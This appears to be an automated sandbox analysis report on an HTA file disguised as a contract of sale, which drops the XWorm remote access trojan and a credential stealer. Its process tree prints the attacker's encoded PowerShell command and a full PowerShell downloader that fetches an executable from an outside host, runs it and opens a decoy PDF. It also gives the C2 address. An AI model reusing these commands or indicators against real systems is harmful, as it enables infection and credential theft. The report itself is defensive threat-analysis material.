Analysis

  • max time kernel
    1198s
  • max time network
    1196s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
  • submitted
    27-03-2023 18:41

General

  • Target

    _43234355_Contract_of_Sale_pdf.hta

  • Size

    840B

  • MD5

    6a8c611062057298887c83ccfe702a15

  • SHA1

    8c3023a178c326d9da94273f6dfe62c73ca07f96

  • SHA256

    27c34ef5f274515bb252b5e52c009260764918de9b44ef8a1eb549f221f66075

  • SHA512

    c562f01f83fbc88f2b4f1177ebcba5ee1a1b752ab7ff94f910d064a4f6d012872496b2082f1bd1d8446b4c5e166bc6e7cdc35c98220742703ee4e30878896133

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://ggdt.xyz/windows/Windows.txt

exe.dropper

https://ggdt.xyz/windows/Windows.txt

Extracted

Family

xworm

C2

property-gourmet.at.ply.gg:51618

Mutex

Xf5kvWS6zqGxig4q

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • XenArmor Suite

    XenArmor is as suite of password recovery tools for various application.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • ACProtect 1.3x - 1.4x DLL software 5 IoCs

    Detects file using ACProtect software.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 20 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\_43234355_Contract_of_Sale_pdf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3704
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -WindowStyle Hidden -NonInteractive -NoProfile -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBQACAAQgB5AHAAYQBzAHMAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AYwAgACgASQAnAHcAJwByACgAJwBoAHQAdABwAHMAOgAvAC8AZwBnAGQAdAAuAHgAeQB6AC8AdwBpAG4AZABvAHcAcwAvAGYAaQBsAGUALgB0AHgAdAAnACkAKQA=
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4384
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eP Bypass -NoProfile -WindowStyle Hidden -c "New-Item -ItemType Directory -Path "C:\Users\Public\Windows" $url = 'https://ggdt.xyz/windows/Windows.txt'; $outputFile = 'C:\Users\Public\Windows\Windows.exe'; $wc = New-Object System.Net.WebClient; $data = $wc.DownloadData($url); $encodedData = [System.Convert]::ToBase64String($data); Add-Content $outputFile $encodedData; $inputFile = 'C:\Users\Public\Windows\Windows.exe'; $outputFile = 'C:\Users\Public\Windows\Windows.exe'; $encodedData = Get-Content $inputFile; $decodedData = [System.Convert]::FromBase64String($encodedData); [System.IO.File]::WriteAllBytes($outputFile, $decodedData); Start-Process $outputFile for ($i = 1; $i -le 2; $i++) { Start-Sleep -Seconds 10 Invoke-Item -Path $outputFile } $pdf = 'C:\Users\Public\Windows\contractofsale.pdf'; Invoke-WebRequest -Uri "https://ggdt.xyz/windows/Payment.pdf" -OutFile $pdf; Start-Process $pdf "
        3⤵
        • Blocklisted process makes network request
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Users\Public\Windows\Windows.exe
          "C:\Users\Public\Windows\Windows.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3652
        • C:\Users\Public\Windows\Windows.exe
          "C:\Users\Public\Windows\Windows.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5112
          • C:\path\to\destination\svchost.exe
            "C:\path\to\destination\svchost.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:916
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
              6⤵
              • Drops startup file
              • Adds Run key to start application
              • Checks processor information in registry
              • Enumerates system info in registry
              PID:4176
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c Cd %temp% && All-In-One.exe OutPut.json
                7⤵
                  PID:3260
                  • C:\Users\Admin\AppData\Local\Temp\All-In-One.exe
                    All-In-One.exe OutPut.json
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Accesses Microsoft Outlook accounts
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of SetWindowsHookEx
                    PID:1324
          • C:\Users\Public\Windows\Windows.exe
            "C:\Users\Public\Windows\Windows.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:908
            • C:\path\to\destination\svchost.exe
              "C:\path\to\destination\svchost.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4568
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                6⤵
                  PID:3108
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\Windows\contractofsale.pdf"
              4⤵
              • Checks processor information in registry
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4784
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4992
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D98D9B335A1BFECF58AAA0DC1B53875F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D98D9B335A1BFECF58AAA0DC1B53875F --renderer-client-id=2 --mojo-platform-channel-handle=1544 --allow-no-sandbox-job /prefetch:1
                  6⤵
                    PID:2964
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F4AF453B51E156B1DB4A91DEC00F2CF2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    6⤵
                      PID:1388
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=5F2203C0F2D3507D5E0C431E36BC5BD3 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=5F2203C0F2D3507D5E0C431E36BC5BD3 --renderer-client-id=4 --mojo-platform-channel-handle=2044 --allow-no-sandbox-job /prefetch:1
                      6⤵
                        PID:3324
                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7CFAF7A61B79B40CA8B84414A24FCE88 --mojo-platform-channel-handle=2460 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                        6⤵
                          PID:3824
                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E5C87E9921322D4D83346678CA0E9A3D --mojo-platform-channel-handle=2668 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                          6⤵
                            PID:1292
                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CAB0A5E3446FB9F93B4F45698F314CC5 --mojo-platform-channel-handle=2480 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                            6⤵
                              PID:2080
                  • C:\path\to\destination\svchost.exe
                    C:\path\to\destination\svchost.exe
                    1⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:1388
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                      2⤵
                        PID:2440
                    • C:\path\to\destination\svchost.exe
                      C:\path\to\destination\svchost.exe
                      1⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1516
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                        2⤵
                          PID:6636
                      • C:\path\to\destination\svchost.exe
                        C:\path\to\destination\svchost.exe
                        1⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:6792
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                          2⤵
                            PID:3292
                        • C:\path\to\destination\svchost.exe
                          C:\path\to\destination\svchost.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:1948
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                            2⤵
                              PID:1708
                          • C:\path\to\destination\svchost.exe
                            C:\path\to\destination\svchost.exe
                            1⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5692
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                              2⤵
                                PID:6060
                            • C:\path\to\destination\svchost.exe
                              C:\path\to\destination\svchost.exe
                              1⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:5332
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                2⤵
                                  PID:6524
                              • C:\path\to\destination\svchost.exe
                                C:\path\to\destination\svchost.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:2876
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                  2⤵
                                    PID:6868
                                • C:\path\to\destination\svchost.exe
                                  C:\path\to\destination\svchost.exe
                                  1⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:7036
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                    2⤵
                                      PID:3916
                                  • C:\path\to\destination\svchost.exe
                                    C:\path\to\destination\svchost.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:6636
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                      2⤵
                                        PID:5784
                                    • C:\path\to\destination\svchost.exe
                                      C:\path\to\destination\svchost.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:1604
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                        2⤵
                                          PID:684
                                      • C:\path\to\destination\svchost.exe
                                        C:\path\to\destination\svchost.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5528
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                          2⤵
                                            PID:2984
                                        • C:\path\to\destination\svchost.exe
                                          C:\path\to\destination\svchost.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3996
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                            2⤵
                                              PID:2224
                                          • C:\path\to\destination\svchost.exe
                                            C:\path\to\destination\svchost.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:5892
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                              2⤵
                                                PID:3280
                                            • C:\path\to\destination\svchost.exe
                                              C:\path\to\destination\svchost.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:6240
                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                2⤵
                                                  PID:7084
                                              • C:\path\to\destination\svchost.exe
                                                C:\path\to\destination\svchost.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:2708
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                  2⤵
                                                    PID:3644
                                                • C:\path\to\destination\svchost.exe
                                                  C:\path\to\destination\svchost.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:5800
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                    "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                    2⤵
                                                      PID:5276
                                                  • C:\path\to\destination\svchost.exe
                                                    C:\path\to\destination\svchost.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5428
                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                      2⤵
                                                        PID:6492
                                                    • C:\path\to\destination\svchost.exe
                                                      C:\path\to\destination\svchost.exe
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of SetThreadContext
                                                      PID:6572
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                        "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                        2⤵
                                                          PID:4436

                                                      Network

                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                      Persistence

                                                      Registry Run Keys / Startup Folder

                                                      1
                                                      T1060

                                                      Defense Evasion

                                                      Modify Registry

                                                      2
                                                      T1112

                                                      Credential Access

                                                      Credentials in Files

                                                      4
                                                      T1081

                                                      Discovery

                                                      System Information Discovery

                                                      3
                                                      T1082

                                                      Query Registry

                                                      3
                                                      T1012

                                                      Collection

                                                      Data from Local System

                                                      4
                                                      T1005

                                                      Email Collection

                                                      1
                                                      T1114

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                                                        Filesize

                                                        36KB

                                                        MD5

                                                        b30d3becc8731792523d599d949e63f5

                                                        SHA1

                                                        19350257e42d7aee17fb3bf139a9d3adb330fad4

                                                        SHA256

                                                        b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                                                        SHA512

                                                        523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows.exe.log
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        2e5af0d1240f1d9a1993408faa09284c

                                                        SHA1

                                                        93dc0c975fb40e704aeb53dc38d9cdd7f6c870da

                                                        SHA256

                                                        d5657f89b370b5331b9332ec1b4d7183be970c9193137392cf425772ad290514

                                                        SHA512

                                                        270f7f8b86692d0b046768bf6edb897155f9309a81e1159eb35567f987eb79fb22a2672de2adc1e0aa56cc99e9ab3a26c14a2c0e8224d22e205f56102c34f2f1

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
                                                        Filesize

                                                        1KB

                                                        MD5

                                                        cd1ffff2cbe3a591e7ce6eebc6a674c1

                                                        SHA1

                                                        fb3b4b26c56f9ad96c55f875e981792d33b77146

                                                        SHA256

                                                        6f5f0fce5c4c628ddb4f7b70e4f77ac31265032a2b8fb8c614e33328d1d4fef6

                                                        SHA512

                                                        f7bc3a7f0dc8e8fc02810a948a46243e037d40b5323cbbb2fa33e82201340f5b78919a981e8f7d5085cb55c95e2df570f37295b96a8934a50a0a1594e2d660cd

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
                                                        Filesize

                                                        323B

                                                        MD5

                                                        7a0939950024ed2b1e9fd75127c95c88

                                                        SHA1

                                                        d16ca7def0e3ebffd9a7367ee59d050288378603

                                                        SHA256

                                                        5313d624ef2ce1ec560a20ae730b887eedb6626898740293d59af7b2fb8d6810

                                                        SHA512

                                                        cd0b186f3913b79d98f54b51c83e57a1f9d114a95def40b9e01140a79ee85b59eb74cd1acd332718d4324fd2ce955530cf6f7380cec44cd631ba5d33e0e0e397

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                        Filesize

                                                        2KB

                                                        MD5

                                                        7762807cfa5ec91a983360ff87821fca

                                                        SHA1

                                                        fbf1704b42ffd4bf399321ec44e21a525fb54167

                                                        SHA256

                                                        4f5f720c5d2ce15c32ca2f530239b6d336d84453ab10c6421a49dc52361877af

                                                        SHA512

                                                        a7170f046e78c0158cf4e3cdcd7172604e5c12ded858b5df31f58203e8424e9d8363ae5e98e036c35857a9406ded574035d1c79d291abdcfe9e8b377ebefb8c3

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                        Filesize

                                                        45KB

                                                        MD5

                                                        5f640bd48e2547b4c1a7421f080f815f

                                                        SHA1

                                                        a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

                                                        SHA256

                                                        916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

                                                        SHA512

                                                        a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                        Filesize

                                                        45KB

                                                        MD5

                                                        c2d06c11dd1f1a8b1dedc1a311ca8cdc

                                                        SHA1

                                                        75c07243f9cb80a9c7aed2865f9c5192cc920e7e

                                                        SHA256

                                                        91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

                                                        SHA512

                                                        db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

